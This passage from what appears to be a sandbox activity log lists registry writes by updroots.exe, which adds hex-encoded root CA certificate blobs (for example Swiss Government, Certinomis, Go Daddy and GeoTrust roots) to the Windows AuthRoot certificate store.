888f7fddf43df7a8d9a495cf64eaacc1cb9a1eb2789f246e93b4a71d51d8e2dcfe6adab6350c7540b6e12c99036c6d82fda91aa68c572fe170ab2177e79b5328870ca70c0964a8ee455cd1d2794bfce722aec5cf97320febdf72e8967b8bb477312f7d135693af20ab9aeff464246a2bfa1851af9bfe4ff4985f7a37086321c5d9f60f7a9ada5ffcfd134f97d5b17c6dcd60e286bc2ddf1f533689d4efc877c3612d6a380e8430d556194ea643747ea77cad0b25805c35d7eb1a846903156ce702a96b230b877e679c0bd293bfd94774cbd20cd4125e02ec71bbbeea40441d25dad126a8a9b47fbc9dd4640e19d3c33d0b50203010001a3773075300f0603551d130101ff040530030101ff300b0603551d0f04040302014630150603551d20040e300c300a06082a817a0179010101301d0603551d0e04160414a3052f186050c2890add2b214fff8e4ea8303136301f0603551d23041830168014a3052f186050c2890add2b214fff8e4ea8303136300d06092a864886f70d0101050500038201010005dc26d8fa77154468fc2f663a74e05de429ff060713844aabcf6da01f5194f849cb743614bc15dddb892fdd8fa05d7cf512eb9f9e38a447ccb396d9be9c25ab037e330f95810dfd16e088be37f06c5dd0319b322b5d1765939860bc6e8fb1a83c1ed91cf3a92642f9641dc2e792f6f41e5aaa19525dafe8a2f760a0f68df089f56ee00a050195c98b200aba5afc9a2c3cbdc3b7c95d7825053f56149b0cdafb3a48fe97695eca1086f74e9604084decb0be5ddc3b8e4fc1fd9a36349a4c547e1703489508111c076f85087e5d4dc49ddbfbaeceb2d1b3b8836c1db2b379f1d870997ef01302ce5edd51d3df3681a11b782f71b3f1594c461828ab85d260565a C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A1585187156586CEF9C454E22AB15C58745607B4\Blob = 030000000100000014000000a1585187156586cef9c454e22ab15c58745607b4090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070308060a2b0601040182370a030406082b0601050507030606082b060105050703070b000000010000003600000053007700690073007300200047006f007600650072006e006d0065006e007400200052006f006f007400200043004100200049000000200000000100000038080000308208343082061ca003020102021100fd75048d7a608693694caa003c65d33d300d06092a864886f70d01010b05003081a6310b3009060355040613024348313b3039060355040a1332546865204665646572616c20417574686f726974696573206f662074686520537769737320436f6e66656465726174696f6e3111300f060355040b1308536572766963657331223020060355040b131943657274696669636174696f6e20417574686f726974696573312330210603550403131a537769737320476f7665726e6d656e7420526f6f742043412049301e170d3131303231353039303030305a170d3335303231353038353935395a3081a6310b3009060355040613024348313b3039060355040a1332546865204665646572616c20417574686f726974696573206f662074686520537769737320436f6e66656465726174696f6e3111300f060355040b1308536572766963657331223020060355040b131943657274696669636174696f6e20417574686f726974696573312330210603550403131a537769737320476f7665726e6d656e7420526f6f74204341204930820222300d06092a864886f70d01010105000382020f003082020a0282020100c80e72f4012f867b0bc263b08d68ed1f3ddeb9839b5ca15dba0f36271104ad065420b71ea0e6cebef099697219356466318d2cbd8e420a9fc6caa9902cdabc853003d9329696f0bea0220d246cd4c67f5a4c51242d5472087c33e9cc28c7666523696b95b4ebbee387e763d7e4fb07ad1292ebe7e40a43b2a9dfc790bc265b91f9a3b7879c94b9108d88c5585c32bc16ec0e574ffea793788fe0c539bb078860c15465eb87be9f3197713cfa8bc8836c5296e0acc0efcb6908955be0e0bbaf27a4c217f1519f847661d824e2fe616d643549ea39c42162bdcce202ff486b38af69c7b9922d82118dbd0b89852aeab7b4b2cd4bebd1faaaf0e04c093c4ddff6311d8630a8418857702c2751decf8b4e3f02f250a517e0671b720c41311f01a2963e3cdb02b69d94e6024ef3f01982b2082313eb91cd51d3aa46c27398983fbac3ee9afcfacdaf720a37138ff9a050b3eafb3f2cbcfa635535f4d2bcb871d291ebe9caca5cec5166a89e5905222fa31adb4fe04562233c5d55fb30952b34a2cfa7b44bc033c934519dd3b32bdfc5ea2c2cc7df441fb68db9fef35ccd372fb06c9c4a08bde8f5d6fa70e56932375c5f0bcb3fe48802cccab3782f7dbf48b321b01f88799b5a8a71d82184290f4a04312abd0d2144ce749d26d3491df886a8e51277c5c0730c50836a906ba1caf8d095d93586c711a33b14c7cb8658560dfb83f7010203010001a382025930820255300f0603551d130101ff040530030101ff30819b0603551d2004819330819030818d06086085740111030100308180304306082b060105050702011637687474703a2f2f7777772e706b692e61646d696e2e63682f6370732f4350535f325f31365f3735365f315f31375f335f315f302e706466303906082b06010505070202302d1a2b546869732069732074686520537769737320476f7665726e6d656e7420526f6f742043412049204350532e30818e0603551d1f048186308183308180a07ea07c867a6c6461703a2f2f61646d696e6469722e61646d696e2e63683a3338392f636e3d5377697373253230476f7665726e6d656e74253230526f6f742532304341253230492c6f753d43657274696669636174696f6e253230417574686f7269746965732c6f753d53657276696365732c6f3d41646d696e2c633d4348301d0603551d0e04160414b51b83bb3b4fb2d2fbe5038ed4615dd11a8eb0a2300e0603551d0f0101ff0404030201063081e30603551d230481db3081d88014b51b83bb3b4fb2d2fbe5038ed4615dd11a8eb0a2a181aca481a93081a6310b3009060355040613024348313b3039060355040a1332546865204665646572616c20417574686f726974696573206f662074686520537769737320436f6e66656465726174696f6e3111300f060355040b1308536572766963657331223020060355040b131943657274696669636174696f6e20417574686f726974696573312330210603550403131a537769737320476f7665726e6d656e7420526f6f742043412049821100fd75048d7a608693694caa003c65d33d300d06092a864886f70d01010b0500038202010025dadf78b026dc9f99eb339cc945ba5c63528d6e0373aa7448c50d0bd2170c2c0bd2c62583d454cd0781542f677625a7e9d77f964777a41d9b45fff1d8f69e470e748c13c4f2bed60728183c9875c1dbeb928826e606648ef9d2fde2993581d1d87517b573eadde818229516190a592a22dc865a434f256836a9d893008f5ec5c36186f0d214099551c47ed852eeb08d8a8871a5d728a7f4dc0658255ec455180895747cb801e74ed8d6f67c2043480da3e0de54c4a85f004943d3453b82656eee8ba30122569af1ce29e50cc46bede74ef8b15581ad71ff84fb0857e647caad87f846f8faf03584edb4d888972277a48f16c83c67d1e16e04ac7b8f36cddea508ac2a8df5a71d9fc7c3912142a38681b92ad8b1e9381d540898390a11ca320e33cdf44ceaa84a06e9183e41c6cfa0f6e02b6b208ea72002eb304181b0e8e4aea418892bdf14f012296d78fa4d44fbb234e5aff38e35f7c3ce2c0b18b4d0798f13bf038b66b8b561d4ac0efd783d09adb5d22c4f56419988440c7e67e3649ffa5a2a58775169b1cd2c9aa734100574fa6e4563cb8b52ad4791a212c8a22604c5d0221e03b3b292375457fd898375036d2d3bb3f1a4a2107c9c938da35084398b955941f60276068abc0e90e7d93aebad265e5753d16fc875e0ab917b6ba17ff91b50a8dcfe4d06e1158aa410eb1e06cf5448159628b6231f1ae37ca58ffa3757 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\398EBE9C0F46C079C3C7AFE07A2FDD9FAE5F8A5C\Blob = 030000000100000014000000398ebe9c0f46c079c3c7afe07a2fdd9fae5f8a5c090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308060a2b0601040182370a030406082b0601050507030606082b060105050703070b00000001000000920000004100750074006f00720069006400610064002000640065002000430065007200740069006600690063006100630069006f006e0020005200610069007a0020006400650020006c0061002000520065007000750062006c00690063006100200042006f006c006900760061007200690061006e0061002000640065002000560065006e0065007a00750065006c006100000020000000010000009c0900003082099830820780a00302010202010a300d06092a864886f70d01010c05003082011e313e303c060355040313354175746f72696461642064652043657274696669636163696f6e205261697a2064656c2045737461646f2056656e657a6f6c616e6f310b30090603550406130256453110300e06035504071307436172616361733119301706035504081310446973747269746f204361706974616c31363034060355040a132d53697374656d61204e6163696f6e616c2064652043657274696669636163696f6e20456c656374726f6e69636131433041060355040b133a5375706572696e74656e64656e63696120646520536572766963696f732064652043657274696669636163696f6e20456c656374726f6e6963613125302306092a864886f70d010901161661637261697a4073757363657274652e676f622e7665301e170d3130313232383136343133365a170d3330313232333233353935395a3082011e313e303c060355040313354175746f72696461642064652043657274696669636163696f6e205261697a2064656c2045737461646f2056656e657a6f6c616e6f310b30090603550406130256453110300e06035504071307436172616361733119301706035504081310446973747269746f204361706974616c31363034060355040a132d53697374656d61204e6163696f6e616c2064652043657274696669636163696f6e20456c656374726f6e69636131433041060355040b133a5375706572696e74656e64656e63696120646520536572766963696f732064652043657274696669636163696f6e20456c656374726f6e6963613125302306092a864886f70d010901161661637261697a4073757363657274652e676f622e766530820222300d06092a864886f70d01010105000382020f003082020a0282020100c13bef1352f19956e3b46c05e11a691661268678af0efce540050ae3d938054ca8d4b5c0c62acf2f79aba1a450ef35111fee822417fca31cabfe07067f377f07585b13d97f005f2bb04fda9fc9b0583361e14fd015ce2e6be8248ce525be855bed4c3f01818ee699185226599b1298651c95be7599160c6444e1f7f27908b4e14757b14adc47429b704b3adaccd16991063fce68fbf9864d03dc83a2ba1516feacc9b60e67b3b1343a3bce448ba38e48ee0330b71a9667c564259902f3ea74757ea6921513d10015eb865cf47b19887fe82e11245e386b819dbc705ef731722a2f1d5fc8ce243c7d723898bf47bda73302fb0fe49dea6660234df94f1b875dcdbfb8ec177caaeb4e36890f3f09a7a0dd7acb0e93122090a5d18cff852b7cdede7e0d50844684646dcaf1232bde7fda0d36b7a3de6226151aeafaaee4b8f67d1101a492d3f2c96fa5f368001ed2698ed9ebe712ac482b0cb699944d3df0155b5977c029d6894c2bc8153a3ac6c570516b426fb4d303a2717bce4c704c6a20950156536fd4522f28be2c9d659732593b7a6adc84628818f7f0da28a3ed9935b3047224a09a283b617694726b9d49542f2d22fe630f92a9ac327b3c19b8049ba7b77fd2bbad439f5df35ce56ccb7727bc81e7aeeb4f622a232750f2a05693e7e65f38215fefc589d62c87f68afb367b5b2ebc90a1eecc4c3556a91ab790c6b3e5730203010001a38202db308202d730120603551d130101ff040830060101ff02010230370603551d120430302e820f73757363657274652e676f622e7665a01b060560865e0202a0120c105249462d472d32303030343033362d30301d0603551d0e04160414adbb221dc6e0d201a8fd76505293ed98c14daed3308201500603551d2304820147308201438014adbb221dc6e0d201a8fd76505293ed98c14daed3a1820126a48201223082011e313e303c060355040313354175746f72696461642064652043657274696669636163696f6e205261697a2064656c2045737461646f2056656e657a6f6c616e6f310b30090603550406130256453110300e06035504071307436172616361733119301706035504081310446973747269746f204361706974616c31363034060355040a132d53697374656d61204e6163696f6e616c2064652043657274696669636163696f6e20456c656374726f6e69636131433041060355040b133a5375706572696e74656e64656e63696120646520536572766963696f732064652043657274696669636163696f6e20456c656374726f6e6963613125302306092a864886f70d010901161661637261697a4073757363657274652e676f622e766582010a300b0603551d0f04040302010630370603551d110430302e820f73757363657274652e676f622e7665a01b060560865e0202a0120c105249462d472d32303030343033362d3030540603551d1f044d304b3024a022a020861e687474703a2f2f7777772e73757363657274652e676f622e76652f6c63723023a021a01f861d6c6461703a2f2f61637261697a2e73757363657274652e676f622e7665303706082b06010505070101042b3029302706082b06010505073001861b687474703a2f2f6f6373702e73757363657274652e676f622e766530400603551d20043930373035060560865e0102302c302a06082b06010505070201161e687474703a2f2f7777772e73757363657274652e676f622e76652f647063300d06092a864886f70d01010c050003820201001c5910e55ea451c147bb65b20b55e22fa9a327bce13c8ac76c0356a3a929a29b8a95d81ff7b6126016be7af4fd03814ffd8181aa4f81701e2eefc092127bbb0f8588c4f91d41b5ba242ac3282613caf900fbd7c35cf968e91bc11822c9a26c64c3f839c34e21ddd6c2dee5b62cc95c38f0de5e6ae427f4b833c4cb61923353a8ccfc9dcd53fb280befed7fb08f7422b6355780a8ae05ae290a3bb2a4fd3de3d4c190f63fcebce444fed1c17e282ffd0024322088c46f187b910e4890bc966260816d14001a51bab55d698d61471c2cac4e4520a94845a38749a37890dd36427fd8766ffd6d8301c6f97f98207f962e2260aba227c0b03524d0c9bf339922530e6e1f624c26fc2433cac103cca91761633324cc6840efafa2e285c38830d3451bee56ea560a0f0a479b3059d849d130900c272a2608285c321f27d7ad0b49e5175163cfe60d3b60511abd430950e691b563e66497aa0b97130106865ca51f95be508e0bb2d2647fdbab4ce643c6e4858d6afe8dfebb94551e91532708d3ba673d3aa1c9c1c514baf9435cc58e218c82a2fd2a3225d5168c1556c098fc2eb28e19a41671c34bdd71fe71ec221df0c18c988187b4bf02b8c4303147c2c0b0af7b33630addac459bc1cc8087f4d9985e9c86fe9a04ff664afc7b6154be57630507c6a7017559e46e393b00f4aa9df39f88bfcfd1252bdf7f73ed1686a990650f7029 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\7030AABF8432A800666CCCC42A887E42B7553E2B C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2E14DAEC28F0FA1E8E389A4EABEB26C00AD383C3\Blob = 0300000001000000140000002e14daec28f0fa1e8e389a4eabeb26c00ad383c3090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308060a2b0601040182370a030406082b0601050507030606082b060105050703070b0000000100000016000000430065007200740069006e006f006d006900730000002000000001000000a00500003082059c30820384a003020102020101300d06092a864886f70d01010505003063310b300906035504061302465231133011060355040a130a43657274696e6f6d697331173015060355040b130e30303032203433333939383930333126302406035504030c1d43657274696e6f6d6973202d204175746f726974c3a920526163696e65301e170d3038303931373038323835395a170d3238303931373038323835395a3063310b300906035504061302465231133011060355040a130a43657274696e6f6d697331173015060355040b130e30303032203433333939383930333126302406035504030c1d43657274696e6f6d6973202d204175746f726974c3a920526163696e6530820222300d06092a864886f70d01010105000382020f003082020a02820201009d859f86d3e3afc7b26b6e33e09eb74234559df981be63d823760e9754cd994c1af139c788d817500c9e61dac04e55dee75ab87a4e77870de5b8ebfa9e5e7b1ec4cf2874c793f514c6222804f991c3ab27736a0e2e4df32e281f70df552f4eedc7716f09722eedd53297d0f15877d160bc4e5edb9a84f64761452bf650a67f6a71274884359eacfe69a99e7a5e3525fab4a749357796a7365be1cddf2370d85d4ca50883f1a6243813a8ec2fa8a167c7a62d8647ee8afcec9b0e74f42b49027b90758cfc99390139d64a89e59e76ab3e962838268bdd8d8cc0f6011e6fa53112387d95c271eeed74aee436a24375d5f1009be2e4d7cc42034b787ae57dbbb8ae2e2093d3e461df71e17667973fb6df6a735a6422e542dbcf810393d8f4e310e072f60070acf0c17a0f057fcf346945b593e419db52162305890e8d48e4256fb378bf62f507fa9524c296b2e8a323c25d03fcc3d3e57cc97523d7f4f5bcdee4dfcd80bf91887da713b439ba2cbabdd16bccf3a528ed449e7d52a36f962e197e1cf35bc7168ebb607d77664754820011606c32c1a8381beb6e9813d6ee38f5f09f0eeffe3181c1d224952f537a69a2f00f86458e58822b4c22d45ea0e77d262748df25468d4a287c869ef99b1a59b965bf05ddb6425d3de60048825e20f71182decad89fe63747261eeb78f761c34164580241f9dae0d1f8f9e8fd5238b6f589df0203010001a35b3059300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604140d8cb661da44b8d1147dc3be7d5e48f0ceca6ab030170603551d200410300e300c060a2a817a01560202000101300d06092a864886f70d01010505000382020100243e60067e1def3a3edbeaaf1c9a2c010bf4c5b5d94931f45d418d890c4eff6ca2fdffe206c8399ff15aa9dd225815a88ad3b1e6320982036cd73f08c7f8b9ba006db9d6fc52325da47fa43194bbb64c387f283035ff9f2353b7b6ee147000402bda47ab347e5ea75630612b8b43acfdb68828f56bb63e604aba429034678deaeb5f45543b17ac8be4c6650feed08c5d6639ce32a7d81097c07e349c9f94f3f6861fcf1b73ad9479876870c333a570e7d8d538946f6379ebbf0a0e08e7c52f0f42a02b1440ff21e005c527e1841113bad6861d410b132389d3c90be88aba7aa3a3733735807d12b833774038c0fa5e30d2f2b6a3b1d6a29597819b52ed694cff80e453db545b036d545fb1b8ef24bd6f9f11c3c764c20f286285665e1a7bb2b7efae35c91933a8b827db3355bf68e175484456fbcdd348bb47893aac69f580c6e444502f54c4aa43c5313158bd96c5ea756c9a75b14df8f797ff9616f2974de8f6f311f93a7d8a386e04cbe1d34515aaa5d11d9d5d63e824e63614e287ad1b59f5449bfbd7777c1f017062a1201aa2c51a28f42103ee2ed9c180eab9d982d65b76c2cb3bb5d200f0a30ee1ad6e40f7dba0b4d046ae15d744c24d35f9d20bf217f6ac66d524b24fd11c99c06ef57deb7404b8f94d7709d7b4cf073009f1b80056d91716160a2b86df8f01191ae5bb8263ffbe0b76165e3737e6d87497a2994579 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\47BEABC922EAE80E78783462A79F45C254FDE68B\Blob = 53000000010000002500000030233021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900200013202000470032000000090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070308060a2b0601040182370a030406082b0601050507030606082b0601050507030703000000010000001400000047beabc922eae80e78783462a79f45c254fde68b2000000001000000c9030000308203c5308202ada003020102020100300d06092a864886f70d01010b0500308183310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c65311a3018060355040a1311476f44616464792e636f6d2c20496e632e3131302f06035504031328476f20446164647920526f6f7420436572746966696361746520417574686f72697479202d204732301e170d3039303930313030303030305a170d3337313233313233353935395a308183310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c65311a3018060355040a1311476f44616464792e636f6d2c20496e632e3131302f06035504031328476f20446164647920526f6f7420436572746966696361746520417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bf716208f1fa5934f71bc918a3f7804958e9228313a6c52043013b84f1e685499f27eaf6841b4ea0b4db7098c73201b1053e074eeef4fa4f2f593022e7ab19566be28007fcf316758039517be5f935b6744ea98d8213e4b63fa90383faa2be8a156a7fde0bc3b6191405caeac3a804943b467c320df3006622c88d696d368c1118b7d3b21c60b438fa028cced3dd4607de0a3eeb5d7cc87cfbb02b53a4926269512505611a44818c2ca9439623dfac3a819a0e29c51ca9e95d1eb69e9e300a39cef18880fb4b5dcc32ec85624325340256270191b43b702a3f6eb1e89c88017d9fd4f9db536d609dbf2ce758abb85f46fccec41b033c09eb49315c6946b3e0470203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604143a9a8507106728b6eff6bd05416e20c194da0fde300d06092a864886f70d01010b0500038201010099db5d79d5f99759670361f17e3b0631752da1208e4f6587b4f7a69cbcd8e92fd0db5aeecf748c73b43842da057bf80275b8fda5b1d7aef6d7de13cb53107e8a46d197fab72e2b11ab90b02780f9e89f5ae9379fabe4df6cb385179d3dd9244f799135d65f04eb8083ab9a022db510f4d890c7047340ed7225a0a99fec9eab68129957c68f123a09a4bd44fd061537c19be432a3ed38e8d864f32c7e14fc02ea9fcdff076817db2290382d7a8dd154f169e35f33ca7a3d7b0ae3ca7f5f39e5e275bac5761833ce2cf02f4cadf7b1e7ce4fa8c49b4a5406c57f7dd5080fe21cfe7e17b8ac5ef6d416b243090c4df6a76bb4998465ca7a88e2e244be5cf7ea1cf5 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8D1784D537F3037DEC70FE578B519A99E610D7B0\Blob = 5300000001000000230000003021301f06092b06010401f022010630123010060a2b0601040182373c0101030200c00b000000010000005c000000470065006f005400720075007300740020005000720069006d006100720079002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790020002d002000470032000000090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080300000001000000140000008d1784d537f3037dec70fe578b519a99e610d7b02000000001000000b2020000308202ae30820235a00302010202103cb2f4480a00e2feeb243b5e603ec36b300a06082a8648ce3d040303308198310b300906035504061302555331163014060355040a130d47656f547275737420496e632e31393037060355040b133028632920323030372047656f547275737420496e632e202d20466f7220617574686f72697a656420757365206f6e6c79313630340603550403132d47656f5472757374205072696d6172792043657274696669636174696f6e20417574686f72697479202d204732301e170d3037313130353030303030305a170d3338303131383233353935395a308198310b300906035504061302555331163014060355040a130d47656f547275737420496e632e31393037060355040b133028632920323030372047656f547275737420496e632e202d20466f7220617574686f72697a656420757365206f6e6c79313630340603550403132d47656f5472757374205072696d6172792043657274696669636174696f6e20417574686f72697479202d2047323076301006072a8648ce3d020106052b810400220362000415b1e8fd031543e5aceb87371162efd28336527d45570b4a8d7b543b3a6e5f1502c050a6cf252f7dca48b8c750631c2a21087c9a36d80bfed126c55831302825f35d5da3b8b6a5b492ed6c2c9febdd4389a23c4b48911d50ec26dfd6602ebd21a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414155f35575155fb25b2ad0369fc01a3fabe1155d5300a06082a8648ce3d04030303670030640230649659a6e809de8bbafa5a8888f01f91d346a8f24a4c0263fb6c5f38db2e4193a90ee69ddc311cb2a0a7181c79e1c73602303a56af9a746cf6fb83e033d3085fa19cc25b9f46d6b6cb910663a206e733ac3ea88112d0cbbad0920bb69e96aa040f8a C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 53000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000140000005500530045005200540072007500730074000000090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308060a2b0601040182370a030406082b0601050507030606082b0601050507030703000000010000001400000002faf3e291435468607857694df5e45b6885186820000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5F3B8CF2F810B37D78B4CEEC1919C37334B9C774 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\F9DD19266B2043F1FE4B3DCB0190AFF11F31A69D\Blob = 030000000100000014000000f9dd19266b2043f1fe4b3dcb0190aff11f31a69d090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080b000000010000003400000043006f007200720065006f00200055007200750067007500610079006f0020002d00200052006f006f007400200043004100000020000000010000001e0600003082061a30820402a003020102021000ca227908232af0f582b885d363ddf1300d06092a864886f70d0101050500307f310b3009060355040613025559312b3029060355040a0c2241444d494e495354524143494f4e204e4143494f4e414c20444520434f5252454f53311f301d060355040b0c16534552564943494f5320454c454354524f4e49434f533122302006035504030c19436f7272656f20557275677561796f202d20526f6f74204341301e170d3038303731343136353231355a170d3330313233313032353935395a307f310b3009060355040613025559312b3029060355040a0c2241444d494e495354524143494f4e204e4143494f4e414c20444520434f5252454f53311f301d060355040b0c16534552564943494f5320454c454354524f4e49434f533122302006035504030c19436f7272656f20557275677561796f202d20526f6f7420434130820222300d06092a864886f70d01010105000382020f003082020a0282020100b13dd2a725709783780ed732c9660e7823e42a1becc3ef538583bbcacf7eea53996d2755c8d13821406e494dc33df6092b061943a998c9014ef4aa80300755f3f5b77d99b77385d51c65566c0d329b080e34612a40098437c366ed0d4c9c0c78403aecedabcca484f275319540a8aabb93b577986cf2c8e0215a23e442a793c8a81d38cea41a4040bf3c93909b5fd694c1225b46d7c50015d58fc6f7de0baf6e8b058f5b80950ea3bd93cc90f27de3487eb2cd073d1bed149074f3dd341f7ce40359f12dcde0a3a03b212e5caeac080650153135ee5ff91f0d34a5806e62724fe321ba38405d5fdb682a5c34c6083bf67c2ea88dc4b7a6add99bbf19410e483909666e0d3401c5bb071123a4dafe60962847dc8f679b13af7d790e78cdc08c2fbb212cfc74161edec0329dfa783a86ba3ec9780a00d1e4e0c912e25bdcebbb809a3235abf030c30e48842f8d080af62c8c4d3280455508dbcd0da8bf087ab8e7685d9a948995bcfc9a8eb87f3ad86cd5f418ac69e2a4c10bb31fa3829ff38a3c85403809fac2053ee19c89fac3056c088f5d51f47fbbc4f36c01bd3d4fc4198b39d9cacce979880455ab6db8da16456539150518fb0b2c7301ed9452e57d0c013b09a04df13d08816634361744f067f35bf205b6219858d9f4a137d96fe6ef56c4fbbf566202ac3030b602d6d216fc4eea87439a685d88a39146282bbf3915150203010001a3819130818e300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147dbb69eb8861e140cf4723640086a2666bdc8495304c0603551d200445304330410604551d20003039303706082b06010505070201162b687474703a2f2f7777772e636f7272656f2e636f6d2e75792f636f7272656f636572742f6370732e706466300d06092a864886f70d0101050500038202010056df1389be62b70e812173a4d437caedb72f9574d789f84b4781ee67edb829df21a0fc546767c8572c5ba10a75782121caa0a8df6b9cd936028db801c16f8e7b6cc9a4b2c546a9ca4c0281faa37b9d3d48e6ca4066d2449d76e055b9a69ca7d143d8f5a0b49df8f7e5a6a642f302325946722b14ec5e65d5518178ceaa2f8d9689796afb0fc85bcfb4ae90b65fe37c626cb7a6ff9081b59891731230afc7e88102687329bb58753db7d643d5ae4df242b9f0dfda310013dae1b3b6068b5bfdc998b8a213d1ba8fc18a1a9e0fff82be0482e52b933e1eb5a20c1bc61ab073897683bc8e3bbb176d14c38bbe7d1526b5a99c177a507a2debe99994ae9810bdee2a5d5dd68e345bac1e87606b98c7878fd39cb268054907f9a931669cfebfa759e82cf036d4f2a81982c09ea739f9b19834a31ffacdc9192d78deb7fd62f093a3fe005bd60ae4f37e7c9728e105ec05344513ff2913618a274fdbb8d2922127b5887767a87ecf243c87080433738f0bb686f8cfefb2a6241e0b91910050163212d80925da634edddb2dd7e7046be3631fa9fea90163c4ca4c146883bc05ac5916fb6ea1076fbb4bbe6d984876257b4a11965408aca9f337ab83c3d1cd8198c0e54035b89f91e76fe64b20168a537bac3ad1983554d0d4bfae7e9a4b1ee975a325b03be765bf4f95f41dbdc4bac94d8151c23f5ad912f4211bd695ea3d90fea993e2 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\968338F113E36A7BABDD08F7776391A68736582E C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
